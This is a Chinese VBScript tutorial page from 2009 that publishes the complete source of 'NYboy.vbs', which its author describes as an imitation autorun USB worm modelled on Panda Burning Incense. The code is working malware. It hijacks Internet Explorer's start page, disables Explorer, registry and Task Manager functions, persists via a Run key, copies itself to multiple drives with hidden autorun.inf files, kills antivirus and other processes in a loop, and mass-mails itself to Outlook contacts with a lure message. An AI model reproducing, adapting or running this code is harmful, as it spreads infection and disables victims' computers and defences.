当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > NYboy.vbs病毒源代码公布,我来模拟熊猫烧香

VBScript
用vbs脚本来关闭 HTML 页面的代码
用vbs实现确定是否安装了某个特定的补丁
用vbs确定用户的登录名的代码
用vbs找到映射到共享的所有驱动器并重新映射它们
可以从一台远程服务器运行 SP2 安装程序Install.vbs
用vbs判断一个日期是否在指定的时段内
vbs+hta中实现在单个 onClick 参数中包括多个子例程的代码
vbs中实现启动两个应用程序,一直等到其中一个程序结束,然后关闭另一个?
用vbs实现对文本文件中的项计数
用vbs对文本文件的内容进行排序
用vbscript把 Word 文档保存为文本文件的代码
用vbs返回 Internet Explorer 的下载控件和 Applet 的列表
用vbscript合并多个文本文件的代码
用vbscript防止本地用户更改其密码
用vbs针对一个 IP 地址范围运行脚本
用vbs 实现从剪贴板中抓取一个 URL 然后在浏览器中打开该 Web 站点
使用vbscript脚本在表单中进行选择的代码
一个把任何文件转成批处理的vbs脚本Any2Bat.vbs
windows脚本调试howto的方法
注册表的禁用与解锁方法集合

VBScript 中的 NYboy.vbs病毒源代码公布,我来模拟熊猫烧香


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 56 ::
收藏到网摘: n/a

使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_
&"&& echo open=NYboy.bat >>C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&& echo shell=Auto>>C:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_
&"&& echo open=NYboy.bat >>D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&& echo shell=Auto>>D:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_
&"&& echo open=NYboy.bat >>E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&& echo shell=Auto>>E:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_
&"&& echo open=NYboy.bat >>F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&& echo shell=Auto>>F:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_
&"&& echo open=NYboy.bat >>I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&& echo shell=Auto>>I:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit